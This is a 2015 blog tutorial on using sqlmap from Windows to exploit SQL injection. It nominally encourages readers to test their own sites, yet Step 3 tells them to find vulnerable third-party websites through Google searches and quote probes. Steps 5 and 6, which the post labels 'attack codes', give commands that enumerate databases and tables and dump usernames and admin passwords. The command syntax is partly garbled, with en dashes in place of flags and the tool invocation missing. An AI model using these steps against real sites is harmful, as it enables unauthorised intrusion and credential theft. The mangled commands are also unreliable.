Skip to content

SQLMAP – How to hack a Website’s SQL tables on Windows

29/12/2015

SQL injection allows us to remotely pull down all the tables, login usernames and admin accounts for a website.  The most powerful tool for SQL injection is SQLMAP, which we can use on Windows and KALI.

Test all your websites with SQLMAP to ensure that they are not vulnerable.  It is simply essential that you test all your websites using this tool.

Step 1 – Download Python for Windows

https://www.python.org/downloads/release/python-2710/

Step 2 – Download SQLMAP for Windows

http://sqlmap.org/

Install to C:/SQLMAP

 

sqlmap download zip

 

Step 3 – Find a vulnerable website

Use Google.  Search for the term

php?=id1

Browse to the website and then put a single dash at the end of the url.

so it reads php?=id1′

If you get an error the website is vulnerable.  Part of EU data protection could include a test or attack against the SQL databases.

 

Step 4 – Run SQLMAP Wizard on Windows

Open a cmd prompt.

cd c:\SQLMAP

dir

look for a second sqlmap-project-sqlmap-xxxx directory.

cd sqlmap-project-sqlmap-xxxx

here you’ll see sqlmap.py listed…  this is python scrip to be run.

sqlmap start

sqlmap.py –wizard

sqlmap wizard

Select Target Website – including the id=1

sqlmap select target website

Select Injection Difficulty  (default)

Go for defaults to start off with.

sqlmap select injection difficulty

Select Enumeration level

Full enumeration of the database would be level 3- as shown

sqlmap dbs enumerate 3

Step 5 – ATTACK CODES

SQLMAP will report the OS used first – regardless of what attack code is used.

sqlmap reports on os used

How do we extract all databases?

http://www.website.com/page.php?id=1 –dbs

Look for how many databases there are, and how many tables!!

 

****

How do we extract Tables?

http://www.website.com/page.php?id=1 –D www – tables

Did you see all the TABLES on the website list out?

Look for likely targets… eg Login, username or password table.

Here we find 11 tables.

sqlmap reports 11 tables on 2 databases

 

Now that we can read the tables, we can start to dump the data out.

*****

How do we get usernames?

http://www.website.com/page.php?id=1 –D www -T uk_cms_gb_login -C username –dump

Look for “admin”

*****

How to get all the Login details?

http://www.website.com/page.php?id=1 –D www -T uk_cms_gb_login –columnssqlmap login columns

This should display columns with items such as Cookie, ID, IP, Password, Username.

 

*****

Step 6 – Get Passwords (of Admin)

http://www.website.com/page.php?id=1 –D www -T uk_cms_gb_login -C password –dump

sqlmap dump password

****

SQLMAP should be used against all your websites.

The last thing you want is someone to steal your entire database.

****

Further SQL queries

https://blog.udemy.com/sql-injection-tutorial/

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: